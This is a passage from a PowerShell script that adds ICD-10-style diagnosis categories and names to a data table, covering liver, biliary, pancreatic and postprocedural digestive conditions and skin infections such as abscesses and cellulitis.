elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other diseases of liver","Chronic passive congestion of liver") + $null = $DiagnosisList.Rows.Add("Other diseases of liver","Central hemorrhagic necrosis of liver") + $null = $DiagnosisList.Rows.Add("Other diseases of liver","Infarction of liver") + $null = $DiagnosisList.Rows.Add("Other diseases of liver","Peliosis hepatis") + $null = $DiagnosisList.Rows.Add("Other diseases of liver","Hepatic veno-occlusive disease") + $null = $DiagnosisList.Rows.Add("Other diseases of liver","Portal hypertension") + $null = $DiagnosisList.Rows.Add("Other diseases of liver","Hepatorenal syndrome") + $null = $DiagnosisList.Rows.Add("Other specified diseases of liver","Hepatopulmonary syndrome") + $null = $DiagnosisList.Rows.Add("Other specified diseases of liver","Other specified diseases of liver") + $null = $DiagnosisList.Rows.Add("Liver disease, unspecified","Liver disease, unspecified") + $null = $DiagnosisList.Rows.Add("Liver disorders in diseases classified elsewhere","Liver disorders in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder with acute cholecystitis","Calculus of gallbladder with acute cholecystitis without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder with acute cholecystitis","Calculus of gallbladder with acute cholecystitis with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder with other cholecystitis","Calculus of gallbladder with chronic cholecystitis without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder with other cholecystitis","Calculus of gallbladder with chronic cholecystitis with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder with other cholecystitis","Calculus of gallbladder with acute and chronic cholecystitis without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder with other cholecystitis","Calculus of gallbladder with acute and chronic cholecystitis with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder with other cholecystitis","Calculus of gallbladder with other cholecystitis without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder with other cholecystitis","Calculus of gallbladder with other cholecystitis with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder without cholecystitis","Calculus of gallbladder without cholecystitis without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder without cholecystitis","Calculus of gallbladder without cholecystitis with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct with cholangitis","Calculus of bile duct with cholangitis, unspecified, without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct with cholangitis","Calculus of bile duct with cholangitis, unspecified, with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct with cholangitis","Calculus of bile duct with acute cholangitis without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct with cholangitis","Calculus of bile duct with acute cholangitis with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct with cholangitis","Calculus of bile duct with chronic cholangitis without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct with cholangitis","Calculus of bile duct with chronic cholangitis with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct with cholangitis","Calculus of bile duct with acute and chronic cholangitis without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct with cholangitis","Calculus of bile duct with acute and chronic cholangitis with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct with cholecystitis","Calculus of bile duct with cholecystitis, unspecified, without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct with cholecystitis","Calculus of bile duct with cholecystitis, unspecified, with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct with cholecystitis","Calculus of bile duct with acute cholecystitis without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct with cholecystitis","Calculus of bile duct with acute cholecystitis with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct with cholecystitis","Calculus of bile duct with chronic cholecystitis without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct with cholecystitis","Calculus of bile duct with chronic cholecystitis with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct with cholecystitis","Calculus of bile duct with acute and chronic cholecystitis without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct with cholecystitis","Calculus of bile duct with acute and chronic cholecystitis with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct without cholangitis or cholecystitis","Calculus of bile duct without cholangitis or cholecystitis without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of bile duct without cholangitis or cholecystitis","Calculus of bile duct without cholangitis or cholecystitis with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder and bile duct with cholecystitis","Calculus of gallbladder and bile duct with cholecystitis, unspecified, without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder and bile duct with cholecystitis","Calculus of gallbladder and bile duct with cholecystitis, unspecified, with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder and bile duct with cholecystitis","Calculus of gallbladder and bile duct with acute cholecystitis without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder and bile duct with cholecystitis","Calculus of gallbladder and bile duct with acute cholecystitis with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder and bile duct with cholecystitis","Calculus of gallbladder and bile duct with chronic cholecystitis without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder and bile duct with cholecystitis","Calculus of gallbladder and bile duct with chronic cholecystitis with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder and bile duct with cholecystitis","Calculus of gallbladder and bile duct with acute and chronic cholecystitis without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder and bile duct with cholecystitis","Calculus of gallbladder and bile duct with acute and chronic cholecystitis with obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder and bile duct without cholecystitis","Calculus of gallbladder and bile duct without cholecystitis without obstruction") + $null = $DiagnosisList.Rows.Add("Calculus of gallbladder and bile duct without cholecystitis","Calculus of gallbladder and bile duct without cholecystitis with obstruction") + $null = $DiagnosisList.Rows.Add("Other cholelithiasis","Other cholelithiasis without obstruction") + $null = $DiagnosisList.Rows.Add("Other cholelithiasis","Other cholelithiasis with obstruction") + $null = $DiagnosisList.Rows.Add("Cholecystitis","Acute cholecystitis") + $null = $DiagnosisList.Rows.Add("Cholecystitis","Chronic cholecystitis") + $null = $DiagnosisList.Rows.Add("Cholecystitis","Acute cholecystitis with chronic cholecystitis") + $null = $DiagnosisList.Rows.Add("Cholecystitis","Cholecystitis, unspecified") + $null = $DiagnosisList.Rows.Add("Other diseases of gallbladder","Obstruction of gallbladder") + $null = $DiagnosisList.Rows.Add("Other diseases of gallbladder","Hydrops of gallbladder") + $null = $DiagnosisList.Rows.Add("Other diseases of gallbladder","Perforation of gallbladder") + $null = $DiagnosisList.Rows.Add("Other diseases of gallbladder","Fistula of gallbladder") + $null = $DiagnosisList.Rows.Add("Other diseases of gallbladder","Cholesterolosis of gallbladder") + $null = $DiagnosisList.Rows.Add("Other diseases of gallbladder","Other specified diseases of gallbladder") + $null = $DiagnosisList.Rows.Add("Other diseases of gallbladder","Disease of gallbladder, unspecified") + $null = $DiagnosisList.Rows.Add("Other diseases of biliary tract","Cholangitis") + $null = $DiagnosisList.Rows.Add("Other diseases of biliary tract","Obstruction of bile duct") + $null = $DiagnosisList.Rows.Add("Other diseases of biliary tract","Perforation of bile duct") + $null = $DiagnosisList.Rows.Add("Other diseases of biliary tract","Fistula of bile duct") + $null = $DiagnosisList.Rows.Add("Other diseases of biliary tract","Spasm of sphincter of Oddi") + $null = $DiagnosisList.Rows.Add("Other diseases of biliary tract","Biliary cyst") + $null = $DiagnosisList.Rows.Add("Other diseases of biliary tract","Other specified diseases of biliary tract") + $null = $DiagnosisList.Rows.Add("Other diseases of biliary tract","Disease of biliary tract, unspecified") + $null = $DiagnosisList.Rows.Add("Idiopathic acute pancreatitis","Idiopathic acute pancreatitis without necrosis or infection") + $null = $DiagnosisList.Rows.Add("Idiopathic acute pancreatitis","Idiopathic acute pancreatitis with uninfected necrosis") + $null = $DiagnosisList.Rows.Add("Idiopathic acute pancreatitis","Idiopathic acute pancreatitis with infected necrosis") + $null = $DiagnosisList.Rows.Add("Biliary acute pancreatitis","Biliary acute pancreatitis without necrosis or infection") + $null = $DiagnosisList.Rows.Add("Biliary acute pancreatitis","Biliary acute pancreatitis with uninfected necrosis") + $null = $DiagnosisList.Rows.Add("Biliary acute pancreatitis","Biliary acute pancreatitis with infected necrosis") + $null = $DiagnosisList.Rows.Add("Alcohol induced acute pancreatitis","Alcohol induced acute pancreatitis without necrosis or infection") + $null = $DiagnosisList.Rows.Add("Alcohol induced acute pancreatitis","Alcohol induced acute pancreatitis with uninfected necrosis") + $null = $DiagnosisList.Rows.Add("Alcohol induced acute pancreatitis","Alcohol induced acute pancreatitis with infected necrosis") + $null = $DiagnosisList.Rows.Add("Drug induced acute pancreatitis","Drug induced acute pancreatitis without necrosis or infection") + $null = $DiagnosisList.Rows.Add("Drug induced acute pancreatitis","Drug induced acute pancreatitis with uninfected necrosis") + $null = $DiagnosisList.Rows.Add("Drug induced acute pancreatitis","Drug induced acute pancreatitis with infected necrosis") + $null = $DiagnosisList.Rows.Add("Other acute pancreatitis","Other acute pancreatitis without necrosis or infection") + $null = $DiagnosisList.Rows.Add("Other acute pancreatitis","Other acute pancreatitis with uninfected necrosis") + $null = $DiagnosisList.Rows.Add("Other acute pancreatitis","Other acute pancreatitis with infected necrosis") + $null = $DiagnosisList.Rows.Add("Acute pancreatitis, unspecified","Acute pancreatitis without necrosis or infection, unspecified") + $null = $DiagnosisList.Rows.Add("Acute pancreatitis, unspecified","Acute pancreatitis with uninfected necrosis, unspecified") + $null = $DiagnosisList.Rows.Add("Acute pancreatitis, unspecified","Acute pancreatitis with infected necrosis, unspecified") + $null = $DiagnosisList.Rows.Add("Other diseases of pancreas","Alcohol-induced chronic pancreatitis") + $null = $DiagnosisList.Rows.Add("Other diseases of pancreas","Other chronic pancreatitis") + $null = $DiagnosisList.Rows.Add("Other diseases of pancreas","Cyst of pancreas") + $null = $DiagnosisList.Rows.Add("Other diseases of pancreas","Pseudocyst of pancreas") + $null = $DiagnosisList.Rows.Add("Other specified diseases of pancreas","Exocrine pancreatic insufficiency") + $null = $DiagnosisList.Rows.Add("Other specified diseases of pancreas","Other specified diseases of pancreas") + $null = $DiagnosisList.Rows.Add("Disease of pancreas, unspecified","Disease of pancreas, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of gallbladder, biliary tract and pancreas in diseases classified elsewhere","Disorders of gallbladder, biliary tract and pancreas in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Intestinal malabsorption","Celiac disease") + $null = $DiagnosisList.Rows.Add("Intestinal malabsorption","Tropical sprue") + $null = $DiagnosisList.Rows.Add("Intestinal malabsorption","Blind loop syndrome, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Intestinal malabsorption","Pancreatic steatorrhea") + $null = $DiagnosisList.Rows.Add("Other malabsorption due to intolerance","Non-celiac gluten sensitivity") + $null = $DiagnosisList.Rows.Add("Other malabsorption due to intolerance","Malabsorption due to intolerance, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other intestinal malabsorption","Whipple's disease") + $null = $DiagnosisList.Rows.Add("Other intestinal malabsorption","Other intestinal malabsorption") + $null = $DiagnosisList.Rows.Add("Intestinal malabsorption, unspecified","Intestinal malabsorption, unspecified") + $null = $DiagnosisList.Rows.Add("Intraoperative and postprocedural complications and disorders of digestive system, not elsewhere classified","Vomiting following gastrointestinal surgery") + $null = $DiagnosisList.Rows.Add("Intraoperative and postprocedural complications and disorders of digestive system, not elsewhere classified","Postgastric surgery syndromes") + $null = $DiagnosisList.Rows.Add("Intraoperative and postprocedural complications and disorders of digestive system, not elsewhere classified","Postsurgical malabsorption, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Postprocedural intestinal obstruction","Postprocedural intestinal obstruction, unspecified as to partial versus complete") + $null = $DiagnosisList.Rows.Add("Postprocedural intestinal obstruction","Postprocedural partial intestinal obstruction") + $null = $DiagnosisList.Rows.Add("Postprocedural intestinal obstruction","Postprocedural complete intestinal obstruction") + $null = $DiagnosisList.Rows.Add("Postcholecystectomy syndrome","Postcholecystectomy syndrome") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of a digestive system organ or structure complicating a procedure","Intraoperative hemorrhage and hematoma of a digestive system organ or structure complicating a digestive system procedure") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of a digestive system organ or structure complicating a procedure","Intraoperative hemorrhage and hematoma of a digestive system organ or structure complicating other procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of a digestive system organ or structure during a procedure","Accidental puncture and laceration of a digestive system organ or structure during a digestive system procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of a digestive system organ or structure during a procedure","Accidental puncture and laceration of a digestive system organ or structure during other procedure") + $null = $DiagnosisList.Rows.Add("Other intraoperative and postprocedural complications and disorders of digestive system","Other intraoperative complications of digestive system") + $null = $DiagnosisList.Rows.Add("Other intraoperative and postprocedural complications and disorders of digestive system","Postprocedural hepatic failure") + $null = $DiagnosisList.Rows.Add("Other intraoperative and postprocedural complications and disorders of digestive system","Postprocedural hepatorenal syndrome") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of a digestive system organ or structure following a procedure","Postprocedural hemorrhage of a digestive system organ or structure following a digestive system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of a digestive system organ or structure following a procedure","Postprocedural hemorrhage of a digestive system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Complications of intestinal pouch","Pouchitis") + $null = $DiagnosisList.Rows.Add("Complications of intestinal pouch","Other complications of intestinal pouch") + $null = $DiagnosisList.Rows.Add("Retained cholelithiasis following cholecystectomy","Retained cholelithiasis following cholecystectomy") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a digestive system organ or structure following a procedure","Postprocedural hematoma of a digestive system organ or structure following a digestive system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a digestive system organ or structure following a procedure","Postprocedural hematoma of a digestive system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a digestive system organ or structure following a procedure","Postprocedural seroma of a digestive system organ or structure following a digestive system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a digestive system organ or structure following a procedure","Postprocedural seroma of a digestive system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Other postprocedural complications and disorders of digestive system","Other postprocedural complications and disorders of digestive system") + $null = $DiagnosisList.Rows.Add("Other diseases of digestive system","Hematemesis") + $null = $DiagnosisList.Rows.Add("Other diseases of digestive system","Melena") + $null = $DiagnosisList.Rows.Add("Other diseases of digestive system","Gastrointestinal hemorrhage, unspecified") + $null = $DiagnosisList.Rows.Add("Other specified diseases of the digestive system","Gastrointestinal mucositis (ulcerative)") + $null = $DiagnosisList.Rows.Add("Other specified diseases of the digestive system","Other specified diseases of the digestive system") + $null = $DiagnosisList.Rows.Add("Disease of digestive system, unspecified","Disease of digestive system, unspecified") + $null = $DiagnosisList.Rows.Add("Colostomy complications","Colostomy complication, unspecified") + $null = $DiagnosisList.Rows.Add("Colostomy complications","Colostomy hemorrhage") + $null = $DiagnosisList.Rows.Add("Colostomy complications","Colostomy infection") + $null = $DiagnosisList.Rows.Add("Colostomy complications","Colostomy malfunction") + $null = $DiagnosisList.Rows.Add("Colostomy complications","Other complications of colostomy") + $null = $DiagnosisList.Rows.Add("Enterostomy complications","Enterostomy complication, unspecified") + $null = $DiagnosisList.Rows.Add("Enterostomy complications","Enterostomy hemorrhage") + $null = $DiagnosisList.Rows.Add("Enterostomy complications","Enterostomy infection") + $null = $DiagnosisList.Rows.Add("Enterostomy complications","Enterostomy malfunction") + $null = $DiagnosisList.Rows.Add("Enterostomy complications","Other complications of enterostomy") + $null = $DiagnosisList.Rows.Add("Gastrostomy complications","Gastrostomy complication, unspecified") + $null = $DiagnosisList.Rows.Add("Gastrostomy complications","Gastrostomy hemorrhage") + $null = $DiagnosisList.Rows.Add("Gastrostomy complications","Gastrostomy infection") + $null = $DiagnosisList.Rows.Add("Gastrostomy complications","Gastrostomy malfunction") + $null = $DiagnosisList.Rows.Add("Gastrostomy complications","Other complications of gastrostomy") + $null = $DiagnosisList.Rows.Add("Esophagostomy complications","Esophagostomy complications, unspecified") + $null = $DiagnosisList.Rows.Add("Esophagostomy complications","Esophagostomy hemorrhage") + $null = $DiagnosisList.Rows.Add("Esophagostomy complications","Esophagostomy infection") + $null = $DiagnosisList.Rows.Add("Esophagostomy complications","Esophagostomy malfunction") + $null = $DiagnosisList.Rows.Add("Esophagostomy complications","Other complications of esophagostomy") + $null = $DiagnosisList.Rows.Add("Complications of gastric band procedure","Infection due to gastric band procedure") + $null = $DiagnosisList.Rows.Add("Complications of gastric band procedure","Other complications of gastric band procedure") + $null = $DiagnosisList.Rows.Add("Complications of other bariatric procedure","Infection due to other bariatric procedure") + $null = $DiagnosisList.Rows.Add("Complications of other bariatric procedure","Other complications of other bariatric procedure") + $null = $DiagnosisList.Rows.Add("Staphylococcal scalded skin syndrome","Staphylococcal scalded skin syndrome") + $null = $DiagnosisList.Rows.Add("Impetigo","Impetigo, unspecified") + $null = $DiagnosisList.Rows.Add("Impetigo","Non-bullous impetigo") + $null = $DiagnosisList.Rows.Add("Impetigo","Bockhart's impetigo") + $null = $DiagnosisList.Rows.Add("Impetigo","Bullous impetigo") + $null = $DiagnosisList.Rows.Add("Impetigo","Other impetigo") + $null = $DiagnosisList.Rows.Add("Impetiginization of other dermatoses","Impetiginization of other dermatoses") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess, furuncle and carbuncle of face","Cutaneous abscess of face") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess, furuncle and carbuncle of face","Furuncle of face") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess, furuncle and carbuncle of face","Carbuncle of face") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess, furuncle and carbuncle of neck","Cutaneous abscess of neck") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess, furuncle and carbuncle of neck","Furuncle of neck") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess, furuncle and carbuncle of neck","Carbuncle of neck") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of trunk","Cutaneous abscess of abdominal wall") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of trunk","Cutaneous abscess of back [any part, except buttock]") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of trunk","Cutaneous abscess of chest wall") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of trunk","Cutaneous abscess of groin") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of trunk","Cutaneous abscess of perineum") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of trunk","Cutaneous abscess of umbilicus") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of trunk","Cutaneous abscess of trunk, unspecified") + $null = $DiagnosisList.Rows.Add("Furuncle of trunk","Furuncle of abdominal wall") + $null = $DiagnosisList.Rows.Add("Furuncle of trunk","Furuncle of back [any part, except buttock]") + $null = $DiagnosisList.Rows.Add("Furuncle of trunk","Furuncle of chest wall") + $null = $DiagnosisList.Rows.Add("Furuncle of trunk","Furuncle of groin") + $null = $DiagnosisList.Rows.Add("Furuncle of trunk","Furuncle of perineum") + $null = $DiagnosisList.Rows.Add("Furuncle of trunk","Furuncle of umbilicus") + $null = $DiagnosisList.Rows.Add("Furuncle of trunk","Furuncle of trunk, unspecified") + $null = $DiagnosisList.Rows.Add("Carbuncle of trunk","Carbuncle of abdominal wall") + $null = $DiagnosisList.Rows.Add("Carbuncle of trunk","Carbuncle of back [any part, except buttock]") + $null = $DiagnosisList.Rows.Add("Carbuncle of trunk","Carbuncle of chest wall") + $null = $DiagnosisList.Rows.Add("Carbuncle of trunk","Carbuncle of groin") + $null = $DiagnosisList.Rows.Add("Carbuncle of trunk","Carbuncle of perineum") + $null = $DiagnosisList.Rows.Add("Carbuncle of trunk","Carbuncle of umbilicus") + $null = $DiagnosisList.Rows.Add("Carbuncle of trunk","Carbuncle of trunk, unspecified") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess, furuncle and carbuncle of buttock","Cutaneous abscess of buttock") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess, furuncle and carbuncle of buttock","Furuncle of buttock") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess, furuncle and carbuncle of buttock","Carbuncle of buttock") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of limb","Cutaneous abscess of right axilla") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of limb","Cutaneous abscess of left axilla") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of limb","Cutaneous abscess of right upper limb") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of limb","Cutaneous abscess of left upper limb") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of limb","Cutaneous abscess of right lower limb") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of limb","Cutaneous abscess of left lower limb") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of limb","Cutaneous abscess of limb, unspecified") + $null = $DiagnosisList.Rows.Add("Furuncle of limb","Furuncle of right axilla") + $null = $DiagnosisList.Rows.Add("Furuncle of limb","Furuncle of left axilla") + $null = $DiagnosisList.Rows.Add("Furuncle of limb","Furuncle of right upper limb") + $null = $DiagnosisList.Rows.Add("Furuncle of limb","Furuncle of left upper limb") + $null = $DiagnosisList.Rows.Add("Furuncle of limb","Furuncle of right lower limb") + $null = $DiagnosisList.Rows.Add("Furuncle of limb","Furuncle of left lower limb") + $null = $DiagnosisList.Rows.Add("Furuncle of limb","Furuncle of limb, unspecified") + $null = $DiagnosisList.Rows.Add("Carbuncle of limb","Carbuncle of right axilla") + $null = $DiagnosisList.Rows.Add("Carbuncle of limb","Carbuncle of left axilla") + $null = $DiagnosisList.Rows.Add("Carbuncle of limb","Carbuncle of right upper limb") + $null = $DiagnosisList.Rows.Add("Carbuncle of limb","Carbuncle of left upper limb") + $null = $DiagnosisList.Rows.Add("Carbuncle of limb","Carbuncle of right lower limb") + $null = $DiagnosisList.Rows.Add("Carbuncle of limb","Carbuncle of left lower limb") + $null = $DiagnosisList.Rows.Add("Carbuncle of limb","Carbuncle of limb, unspecified") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of hand","Cutaneous abscess of right hand") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of hand","Cutaneous abscess of left hand") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of hand","Cutaneous abscess of unspecified hand") + $null = $DiagnosisList.Rows.Add("Furuncle hand","Furuncle right hand") + $null = $DiagnosisList.Rows.Add("Furuncle hand","Furuncle left hand") + $null = $DiagnosisList.Rows.Add("Furuncle hand","Furuncle unspecified hand") + $null = $DiagnosisList.Rows.Add("Carbuncle of hand","Carbuncle of right hand") + $null = $DiagnosisList.Rows.Add("Carbuncle of hand","Carbuncle of left hand") + $null = $DiagnosisList.Rows.Add("Carbuncle of hand","Carbuncle of unspecified hand") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of foot","Cutaneous abscess of right foot") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of foot","Cutaneous abscess of left foot") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of foot","Cutaneous abscess of unspecified foot") + $null = $DiagnosisList.Rows.Add("Furuncle of foot","Furuncle of right foot") + $null = $DiagnosisList.Rows.Add("Furuncle of foot","Furuncle of left foot") + $null = $DiagnosisList.Rows.Add("Furuncle of foot","Furuncle of unspecified foot") + $null = $DiagnosisList.Rows.Add("Carbuncle of foot","Carbuncle of right foot") + $null = $DiagnosisList.Rows.Add("Carbuncle of foot","Carbuncle of left foot") + $null = $DiagnosisList.Rows.Add("Carbuncle of foot","Carbuncle of unspecified foot") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of other sites","Cutaneous abscess of head [any part, except face]") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess of other sites","Cutaneous abscess of other sites") + $null = $DiagnosisList.Rows.Add("Furuncle of other sites","Furuncle of head [any part, except face]") + $null = $DiagnosisList.Rows.Add("Furuncle of other sites","Furuncle of other sites") + $null = $DiagnosisList.Rows.Add("Carbuncle of other sites","Carbuncle of head [any part, except face]") + $null = $DiagnosisList.Rows.Add("Carbuncle of other sites","Carbuncle of other sites") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess, furuncle and carbuncle, unspecified","Cutaneous abscess, unspecified") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess, furuncle and carbuncle, unspecified","Furuncle, unspecified") + $null = $DiagnosisList.Rows.Add("Cutaneous abscess, furuncle and carbuncle, unspecified","Carbuncle, unspecified") + $null = $DiagnosisList.Rows.Add("Cellulitis of finger","Cellulitis of right finger") + $null = $DiagnosisList.Rows.Add("Cellulitis of finger","Cellulitis of left finger") + $null = $DiagnosisList.Rows.Add("Cellulitis of finger","Cellulitis of unspecified finger") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of finger","Acute lymphangitis of right finger") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of finger","Acute lymphangitis of left finger") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of finger","Acute lymphangitis of unspecified finger") + $null = $DiagnosisList.Rows.Add("Cellulitis of toe","Cellulitis of right toe") + $null = $DiagnosisList.Rows.Add("Cellulitis of toe","Cellulitis of left toe") + $null = $DiagnosisList.Rows.Add("Cellulitis of toe","Cellulitis of unspecified toe") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of toe","Acute lymphangitis of right toe") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of toe","Acute lymphangitis of left toe") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of toe","Acute lymphangitis of unspecified toe") + $null = $DiagnosisList.Rows.Add("Cellulitis of other parts of limb","Cellulitis of right axilla") + $null = $DiagnosisList.Rows.Add("Cellulitis of other parts of limb","Cellulitis of left axilla") + $null = $DiagnosisList.Rows.Add("Cellulitis of other parts of limb","Cellulitis of right upper limb") + $null = $DiagnosisList.Rows.Add("Cellulitis of other parts of limb","Cellulitis of left upper limb") + $null = $DiagnosisList.Rows.Add("Cellulitis of other parts of limb","Cellulitis of right lower limb") + $null = $DiagnosisList.Rows.Add("Cellulitis of other parts of limb","Cellulitis of left lower limb") + $null = $DiagnosisList.Rows.Add("Cellulitis of other parts of limb","Cellulitis of unspecified part of limb") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of other parts of limb","Acute lymphangitis of right axilla") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of other parts of limb","Acute lymphangitis of left axilla") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of other parts of limb","Acute lymphangitis of right upper limb") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of other parts of limb","Acute lymphangitis of left upper limb") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of other parts of limb","Acute lymphangitis of right lower limb") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of other parts of limb","Acute lymphangitis of left lower limb") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of other parts of limb","Acute lymphangitis of unspecified part of limb") + $null = $DiagnosisList.Rows.Add("Cellulitis and acute lymphangitis of face","Cellulitis of face") + $null = $DiagnosisList.Rows.Add("Cellulitis and acute lymphangitis of face","Acute lymphangitis of face") + $null = $DiagnosisList.Rows.Add("Cellulitis and acute lymphangitis of face","Periorbital cellulitis") + $null = $DiagnosisList.Rows.Add("Cellulitis and acute lymphangitis of neck","Cellulitis of neck") + $null = $DiagnosisList.Rows.Add("Cellulitis and acute lymphangitis of neck","Acute lymphangitis of neck") + $null = $DiagnosisList.Rows.Add("Cellulitis of trunk","Cellulitis of abdominal wall") + $null = $DiagnosisList.Rows.Add("Cellulitis of trunk","Cellulitis of back [any part except buttock]") + $null = $DiagnosisList.Rows.Add("Cellulitis of trunk","Cellulitis of chest wall") + $null = $DiagnosisList.Rows.Add("Cellulitis of trunk","Cellulitis of groin") + $null = $DiagnosisList.Rows.Add("Cellulitis of trunk","Cellulitis of perineum") + $null = $DiagnosisList.Rows.Add("Cellulitis of trunk","Cellulitis of umbilicus") + $null = $DiagnosisList.Rows.Add("Cellulitis of trunk","Cellulitis of buttock") + $null = $DiagnosisList.Rows.Add("Cellulitis of trunk","Cellulitis of trunk, unspecified") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of trunk","Acute lymphangitis of abdominal wall") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of trunk","Acute lymphangitis of back [any part except buttock]") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of trunk","Acute lymphangitis of chest wall") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of trunk","Acute lymphangitis of groin") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of trunk","Acute lymphangitis of perineum") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of trunk","Acute lymphangitis of umbilicus") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of trunk","Acute lymphangitis of buttock") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of trunk","Acute lymphangitis of trunk, unspecified") + $null = $DiagnosisList.Rows.Add("Cellulitis of other sites","Cellulitis of head [any part, except face]") + $null = $DiagnosisList.Rows.Add("Cellulitis of other sites","Cellulitis of other sites") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of other sites","Acute lymphangitis of head [any part, except face]") + $null = $DiagnosisList.Rows.Add("Acute lymphangitis of other sites","Acute lymphangitis of other sites") + $null = 